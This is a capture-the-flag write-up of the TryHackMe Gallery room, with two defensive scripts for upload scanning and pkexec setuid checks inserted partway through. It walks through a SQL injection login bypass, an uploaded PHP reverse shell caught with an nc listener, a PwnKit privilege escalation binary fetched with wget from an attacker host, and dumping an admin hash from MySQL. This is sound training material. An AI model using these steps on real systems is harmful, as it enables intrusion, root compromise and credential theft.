
Tryhackme Gallery Room Writeup

  • Penetration Testing methodology

    • Scanning
      • Nmap Scan
    • Enumeration
      • Enumerating HTTP Service
      • Searching Exploit
      • Testing Login page
    • Exploitation
      • Reading exploit code
      • Trying exploit code
      • Finding another way to exploit cms
      • Uploading shell
    • Privilege Escalation
      • Enumerating kernel make
      • Searching Exploit
      • Compiling exploit
      • Transferring Binary
      • Getting Root Shell
      • Getting Answers
  • Walkthrough

    • There are two flags to find in this room: 1. User flag 2. Root flag

    • Scanning the IP with Nmap gives the following output. (screenshot: Initial scanning)

      We can see that an HTTP service is running on port 80 and on port 8080. Visiting IP:Port, on port 8080 we see the following. (screenshot: Visiting Simple Gallery page) I tried an SQLi payload in Username: ' or 1=1 -- with Password: a, but it didn't work. (screenshot: Running SQLi)

      So the CMS is Simple Image Gallery. Searching for it on searchsploit gives the following output. (screenshot: Searching exploits)

      Copying the exploit to the current directory. (screenshot: Copying exploit)

      It's good practice to read the exploit. Even if you don't understand all of it, try to read some parts to see what it's doing and how. [ My Takeaway ]

      Before digging into the code I ran it to check how the exploit works. (screenshot: Running exploit)

      The code lets us execute commands via a parameter called cmd, through a file it uploaded into the gallery/uploads directory. I visited the provided URL and found the code executing: the output of the whoami command. (screenshot: Running exploit)

      After a lot of tries to get a reverse shell through the cmd parameter I was frustrated, so in one attempt I read the code [ My Takeaway :D ]. Its content is as follows: (screenshots: Reading exploit, parts 1 to 3)

      While reading I came across a line that looked to me like an SQLi payload, see below: (screenshot: Reading exploit)

      So I got the hint that the payload I had been trying did not work for this room, and I tried the payload used in the exploit instead. (screenshot: Running the Simple CMS exploit's SQLi payload) And boooom!! I was not expecting this, but it worked... (screenshot: We're in)

      OK!! We are in. Walking through the application I found a page "Albums", and on visiting it I saw upload functionality. (screenshot: moving)

      I thought I'd give it a try and upload the PHP reverse shell by Pentest Monkey (it can be found in /usr/share/webshells/php/ or on Google, since it's a famous reverse shell script and easy to find).

      So I edited my reverse shell with my IP and my favorite port. (screenshot: Editing shell IP) BTW, off-topic: I am using 1337 not because I am leet but because I want to be leet XD #HECKUR MINDSET

      Uploading the PHP reverse shell and listening on my attacker machine with nc -lvnp 1337 [ for me it's 1337; use whatever port you typed into the script ]. (screenshot: Upload shell)

      Shell uploaded successfully!!!! (screenshot: Shell uploaded)

      By clicking on the script you uploaded you can activate the shell. But don't forget to start the listener before you activate the shell. (screenshot: got shell)

      Whoop whoop, we got a shell... OK, first things first, let's stabilise our shell. I learned stabilising from the What the Shell room on TryHackMe.

      • export TERM=xterm
      • which python3 [ to find out which Python is installed ]
      • python3 -c 'import pty;pty.spawn("/bin/bash")'
      • press CTRL+Z to background the shell, then run the next command on the attacker machine
      • stty raw -echo ; fg
      • reset
      • [ These commands give us a fully functional shell ] (screenshot: Stabilising shell) After the reset you get a clean shell, like below :D
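A defender-side counterpart to the upload step above, added here and not part of the original writeup or of the gallery CMS: a POSIX shell script that flags every file under an uploads directory whose content carries a PHP open tag, whatever its extension. That is how a reverse shell dropped into gallery/uploads shows up on disk, and it also catches a PHP body hidden behind an image header, which a name-only check for *.php would miss. The function names and the directory argument are my own; the only path taken from the writeup is gallery/uploads.

```shell
#!/bin/sh
# Added example (not from the writeup or the gallery CMS): find files under an
# upload directory that contain PHP code, regardless of their extension.
# A reverse shell dropped into gallery/uploads, or a PHP body hidden behind a
# .gif header, both show up here; a name-only check (*.php) would miss the second.

# Print the path of every regular file under $1 whose contents contain a PHP
# open tag ("<?php" or the short echo tag "<?="). grep -l prints each matching
# path once and reads binary files too, so polyglot images are caught.
find_php_uploads() {
    find "$1" -type f -exec grep -l -e '<?php' -e '<?=' '{}' + 2>/dev/null || true
}

# Number of such files, for a cron job that alerts on anything above 0.
count_php_uploads() {
    n=$(find_php_uploads "$1" | grep -c '' || true)
    echo "$n"
}

# Stand-alone use: sh scan_uploads.sh /path/to/gallery/uploads
if [ $# -gt 0 ]; then
    hits=$(count_php_uploads "$1")
    find_php_uploads "$1"
    echo "$hits file(s) with PHP code under $1"
fi
```

Run it from cron against the gallery's upload directory and alert on a non-zero count. A scanner only finds what is already there, so pair it with a web server rule that refuses to execute PHP from the upload directory; with that in place an uploaded shell is just a dead file.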
  • Privilege Escalation TIIIIIIIIIIIME !!!!

    • For privesc you can run linpeas or any other script, or enumerate manually.

    • But in this writeup we will run PwnKit, to learn something new about the Polkit pkexec exploit. The exploit code can be found here -> https://github.com/ly4k/PwnKit/blob/main/PwnKit.c (screenshot: enumerating privesc)

    • Let's do this... Compile the code with:

    • gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC (screenshot: pkexec binary) We have the binary compiled, now let's move it to the victim host.

      • 1st, host a server on the attacker machine [ Note: host the server from the directory where your binary file is! ]
        • Command: python3 -m http.server 80
      • 2nd, go to the victim terminal and download the binary with:
        • Command: wget http://[attackerIP:PORT]/file_name (screenshot: Transferring binary)

          Also note the working directory: I am in /dev/shm. You need a directory you have write permission on, like /tmp, /dev/shm or /var/tmp. Now that we have the binary, let's make it executable with the command:

          • chmod +x PwnKit Now let's run the binary. (screenshot: Got shell)

      Controlling my emotions after getting a root shell ;-; So let's grab the flags and finish it ASAP.

      • /home/mike has user.txt
      • /root/ has root.txt (screenshot: Flags txt) We also need the hash of an admin user to complete the room.
      • Use the command netstat -altuopn to check the services running on localhost.
      • We can see 3306 is listening, which is the MySQL port.
      • Using mysql -u root -p [ use the password root ], access the database.
      • And we got the admin hash. Submitting it, the room has been completed. (screenshots: databases, database hash)
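From the defender's side of the privilege escalation above, an added example that is not from the writeup and not from the PwnKit project: a POSIX shell check for whether a pkexec binary still carries the setuid bit. That bit is what the exploit depends on, and clearing it (chmod 0755 /usr/bin/pkexec) was the widely published stop-gap until the distribution's patched Polkit package is installed. The function names and the path argument are my own; the script reports and can remove the bit, it does not check the Polkit version.

```shell
#!/bin/sh
# Added example (not from the writeup or from PwnKit): report whether a
# pkexec binary, or any path you pass, is still setuid. A setuid pkexec on a
# host without the patched Polkit package is what the privesc relies on;
# clearing the bit was the documented stop-gap until the package update.

# Usage: pkexec_setuid_status /usr/bin/pkexec
# Prints one word: "setuid", "not-setuid" or "missing".
# Returns 1 only for "setuid", so a cron job can alert on the exit status.
pkexec_setuid_status() {
    path="$1"
    if [ ! -e "$path" ]; then
        echo "missing"
        return 0
    fi
    # POSIX test: -u is true when the set-user-ID bit is set in the mode.
    if [ -u "$path" ]; then
        echo "setuid"
        return 1
    fi
    echo "not-setuid"
    return 0
}

# Stop-gap remediation: clear the set-user-ID bit (chmod u-s) and leave the
# rest of the mode untouched. Must run as root on the real binary.
drop_setuid() {
    chmod u-s "$1" && echo "removed setuid bit from $1"
}

# Stand-alone use: check the path given on the command line.
if [ $# -gt 0 ]; then
    pkexec_setuid_status "$1" || echo "install the patched polkit package, or as root run: drop_setuid $1"
fi
```

Note that a patched pkexec is setuid again by design, so "setuid" on its own is only a finding on hosts whose package has not been updated; the check is for spotting machines where neither the update nor the stop-gap has been applied. The writeup's wget into /dev/shm is the same lesson from the other side: world-writable scratch directories that allow execution let a downloaded binary run, so mounting them noexec where workloads permit removes that step too.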

If you have any suggestions, please advise.
